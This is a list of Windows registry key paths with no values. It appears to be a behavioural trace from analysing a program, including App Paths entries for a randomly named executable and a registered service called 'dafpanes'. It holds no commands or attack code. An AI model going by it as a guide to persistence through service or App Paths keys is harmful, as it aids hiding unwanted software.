HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\PropertyHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\sPVjc.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\sPVjc.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\Environment
HKEY_CURRENT_USER
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\Environment
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\EnableConsoleTracing
